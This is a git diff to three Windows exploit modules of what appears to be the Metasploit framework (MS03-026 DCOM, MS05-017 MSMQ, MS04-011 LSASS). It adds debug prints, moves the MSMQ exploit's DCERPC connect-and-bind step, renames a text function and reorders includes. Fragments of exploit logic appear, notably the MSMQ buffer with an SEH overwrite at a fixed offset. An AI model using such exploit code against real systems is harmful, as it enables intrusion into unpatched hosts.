diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
index 0bb4a39491..1a8faf3880 100644
--- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
+++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
@@ -185,6 +185,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
 			NDR.long(1) +
 			NDR.long(rand(0xFFFFFFFF))
 	
+		p uncpath
 		
 		print_status('Sending exploit ...')
 		begin
diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
index cd924b8b82..b5105e8631 100644
--- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
+++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
@@ -60,13 +60,6 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
 	end
 
 	def exploit
-		connect
-		print_status("Trying target #{target.name}...")
-		
-		handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
-		print_status("Binding to #{handle} ...")
-		dcerpc_bind(handle)
-		print_status("Bound to #{handle} ...")
 
 
 		# MSMQ supports three forms of queue names, the two we can use are
@@ -81,7 +74,7 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
 		queue_nlen = queue_name.length * 2
 		queue_path = unicode(queue_name + "\\PRIVATE\$\\")
 
-		buf   = Rex::Text.rand_text_englishtext(4000, payload_badchars)
+		buf   = Rex::Text.rand_text_english(4000, payload_badchars)
 
 		# Windows 2000 SEH offset goes first
 		buf[332 + queue_nlen + 0, 4] = [ target['Rets'][0] ].pack('V')
@@ -97,6 +90,17 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
 		# Get the unicode length of this string
 		queue_plen = queue_path.length / 2
 
+		p queue_path
+	
+		connect
+		print_status("Trying target #{target.name}...")
+		
+		handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
+		print_status("Binding to #{handle} ...")
+		dcerpc_bind(handle)
+		print_status("Bound to #{handle} ...")
+
+	
 		stubdata = 
 			NDR.long(1) +
 			NDR.long(1) +
diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb
index ca39e4cf7a..3ffdd9003f 100644
--- a/modules/exploits/windows/smb/ms04_011_lsass.rb
+++ b/modules/exploits/windows/smb/ms04_011_lsass.rb
@@ -8,8 +8,9 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
 	# This module exploits a vulnerability in the LSASS service
 	#
 	
-	include Exploit::Remote::SMB
 	include Exploit::Remote::DCERPC
+	include Exploit::Remote::SMB
+	
 	
 	def initialize(info = {})
 		super(update_info(info,